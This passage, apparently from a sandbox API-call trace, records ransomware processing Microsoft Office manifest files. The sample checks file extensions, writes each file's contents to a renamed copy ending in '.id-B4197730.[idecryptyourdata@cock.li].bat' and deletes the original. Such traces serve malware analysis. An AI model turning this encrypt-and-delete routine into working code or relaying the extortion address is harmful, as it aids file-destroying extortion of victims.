(lpString1=".ppt", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.539] lstrlenW (lpString=".zip") returned 4 [0059.539] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.539] lstrlenW (lpString=".rar") returned 4 [0059.539] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString=".bz2") returned 4 [0059.539] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString=".7z") returned 3 [0059.539] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.539] lstrlenW (lpString=".dbf") returned 4 [0059.539] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.539] lstrlenW (lpString=".1cd") returned 4 [0059.539] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.539] lstrlenW (lpString=".jpg") returned 4 [0059.539] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.539] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.540] lstrlenW (lpString="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 53 [0059.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.540] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.540] CloseHandle (hObject=0x358) returned 1 [0059.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.540] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.540] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.541] GetLastError () returned 0x0 [0059.541] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.544] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.545] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.545] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.545] SetEndOfFile (hFile=0x350) returned 1 [0059.546] CloseHandle (hObject=0x350) returned 1 [0059.546] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.546] SetEndOfFile (hFile=0x358) returned 1 [0059.547] CloseHandle (hObject=0x358) returned 1 [0059.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 1 [0059.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.548] lstrlenW (lpString=".doc") returned 4 [0059.548] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.548] lstrlenW (lpString=".docx") returned 5 [0059.548] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.548] lstrlenW (lpString=".pdf") returned 4 [0059.548] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.548] lstrlenW (lpString=".xls") returned 4 [0059.548] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.548] lstrlenW (lpString=".xlsx") returned 5 [0059.548] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.548] lstrlenW (lpString=".ppt") returned 4 [0059.548] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString=".zip") returned 4 [0059.549] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.549] lstrlenW (lpString=".rar") returned 4 [0059.549] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString=".bz2") returned 4 [0059.549] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString=".7z") returned 3 [0059.549] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString=".dbf") returned 4 [0059.549] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString=".1cd") returned 4 [0059.549] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString=".jpg") returned 4 [0059.549] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.549] lstrlenW (lpString=".doc") returned 4 [0059.549] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString=".docx") returned 5 [0059.549] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.549] lstrlenW (lpString=".pdf") returned 4 [0059.549] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString=".xls") returned 4 [0059.549] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.549] lstrlenW (lpString=".xlsx") returned 5 [0059.550] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.550] lstrlenW (lpString=".ppt") returned 4 [0059.550] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.550] lstrlenW (lpString=".zip") returned 4 [0059.550] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.550] lstrlenW (lpString=".rar") returned 4 [0059.550] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.550] lstrlenW (lpString=".bz2") returned 4 [0059.550] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.550] lstrlenW (lpString=".7z") returned 3 [0059.550] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.550] lstrlenW (lpString=".dbf") returned 4 [0059.550] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.550] lstrlenW (lpString=".1cd") returned 4 [0059.550] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0059.550] lstrlenW (lpString=".jpg") returned 4 [0059.550] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.550] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.550] lstrlenW (lpString="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 53 [0059.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.551] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.551] CloseHandle (hObject=0x358) returned 1 [0059.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.551] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.551] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.552] GetLastError () returned 0x0 [0059.552] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.555] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.556] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.556] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.556] SetEndOfFile (hFile=0x350) returned 1 [0059.556] CloseHandle (hObject=0x350) returned 1 [0059.557] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.557] SetEndOfFile (hFile=0x358) returned 1 [0059.558] CloseHandle (hObject=0x358) returned 1 [0059.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 1 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.559] lstrlenW (lpString=".doc") returned 4 [0059.559] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString=".docx") returned 5 [0059.559] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.559] lstrlenW (lpString=".pdf") returned 4 [0059.559] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString=".xls") returned 4 [0059.559] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString=".xlsx") returned 5 [0059.559] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.559] lstrlenW (lpString=".ppt") returned 4 [0059.559] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.559] lstrlenW (lpString=".zip") returned 4 [0059.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.559] lstrlenW (lpString=".rar") returned 4 [0059.559] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString=".bz2") returned 4 [0059.559] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString=".7z") returned 3 [0059.559] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.559] lstrlenW (lpString=".dbf") returned 4 [0059.559] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.559] lstrlenW (lpString=".1cd") returned 4 [0059.559] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.560] lstrlenW (lpString=".jpg") returned 4 [0059.560] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.560] lstrlenW (lpString=".doc") returned 4 [0059.560] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString=".docx") returned 5 [0059.560] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.560] lstrlenW (lpString=".pdf") returned 4 [0059.560] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString=".xls") returned 4 [0059.560] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString=".xlsx") returned 5 [0059.560] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.560] lstrlenW (lpString=".ppt") returned 4 [0059.560] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.560] lstrlenW (lpString=".zip") returned 4 [0059.560] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.560] lstrlenW (lpString=".rar") returned 4 [0059.560] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString=".bz2") returned 4 [0059.560] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.560] lstrlenW (lpString=".7z") returned 3 [0059.560] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.560] lstrlenW (lpString=".dbf") returned 4 [0059.561] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.561] lstrlenW (lpString=".1cd") returned 4 [0059.561] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0059.561] lstrlenW (lpString=".jpg") returned 4 [0059.561] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.561] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.561] lstrlenW (lpString="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 53 [0059.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.562] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.562] CloseHandle (hObject=0x358) returned 1 [0059.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.562] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.562] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.562] GetLastError () returned 0x0 [0059.562] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.598] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.599] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.599] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.599] SetEndOfFile (hFile=0x350) returned 1 [0059.599] CloseHandle (hObject=0x350) returned 1 [0059.600] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.600] SetEndOfFile (hFile=0x358) returned 1 [0059.601] CloseHandle (hObject=0x358) returned 1 [0059.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 1 [0059.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.602] lstrlenW (lpString=".doc") returned 4 [0059.602] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString=".docx") returned 5 [0059.602] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.602] lstrlenW (lpString=".pdf") returned 4 [0059.602] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString=".xls") returned 4 [0059.602] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString=".xlsx") returned 5 [0059.602] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.602] lstrlenW (lpString=".ppt") returned 4 [0059.602] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.602] lstrlenW (lpString=".zip") returned 4 [0059.602] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.602] lstrlenW (lpString=".rar") returned 4 [0059.602] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString=".bz2") returned 4 [0059.602] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.602] lstrlenW (lpString=".7z") returned 3 [0059.602] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.602] lstrlenW (lpString=".dbf") returned 4 [0059.602] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString="C:\\Program Files\\Microsoft 